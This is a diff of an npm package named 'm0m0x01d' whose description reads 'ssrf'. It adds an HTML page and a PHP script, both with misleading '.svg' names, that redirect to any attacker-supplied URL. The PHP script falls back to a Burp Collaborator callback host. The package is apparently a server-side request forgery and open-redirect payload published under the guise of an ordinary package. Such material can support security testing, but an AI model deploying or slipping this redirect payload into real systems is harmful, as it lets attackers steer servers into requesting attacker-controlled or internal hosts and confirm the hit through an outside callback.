m0m0x01d 3.0.0 → 5.0.0

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "m0m0x01d",
-  "version": "3.0.0",
+  "version": "5.0.0",
   "description": "ssrf",
   "main": "index.html",
   "scripts": {

package/redirect.svg.html

@@ -0,0 +1,25 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Redirect</title>
+    <script>
+        window.onload = function() {
+            // Get the URL query parameter
+            const urlParams = new URLSearchParams(window.location.search);
+            const targetUrl = urlParams.get('url');
+
+            // If a valid URL is provided, redirect to it
+            if (targetUrl) {
+                window.location.href = targetUrl;
+            } else {
+                document.body.innerHTML = "No URL provided for redirection.";
+            }
+        }
+    </script>
+</head>
+<body>
+</body>
+</html>
+

package/redirect.svg.php

@@ -0,0 +1,21 @@
+<?php
+// Get the target URL from the 'next_url' query parameter
+$next_url = isset($_GET['next_url']) ? $_GET['next_url'] : 'https://9lv13zw73wdy5t6hjxcpw5tz9qfh36.burpcollaborator.net';
+
+// Set the appropriate headers for the 302 redirect
+header("HTTP/1.1 302 Found");
+header("Location: $next_url");
+
+// Optional: Set additional headers if required
+header("Cache-Control: public, max-age=0");
+header("Set-Cookie: sites=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
+header("Set-Cookie: sessionid=; expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; Path=/");
+header("Strict-Transport-Security: max-age=31536000; includeSubDomains; preload");
+header("X-Frame-Options: SAMEORIGIN");
+header("X-XSS-Protection: 1; mode=block");
+header("X-Content-Type-Options: nosniff");
+header("Content-Security-Policy: frame-ancestors 'self'; base-uri 'self'; form-action 'self' https://*.example.com; upgrade-insecure-requests");
+
+// Ensure the connection is closed after the headers
+exit();
+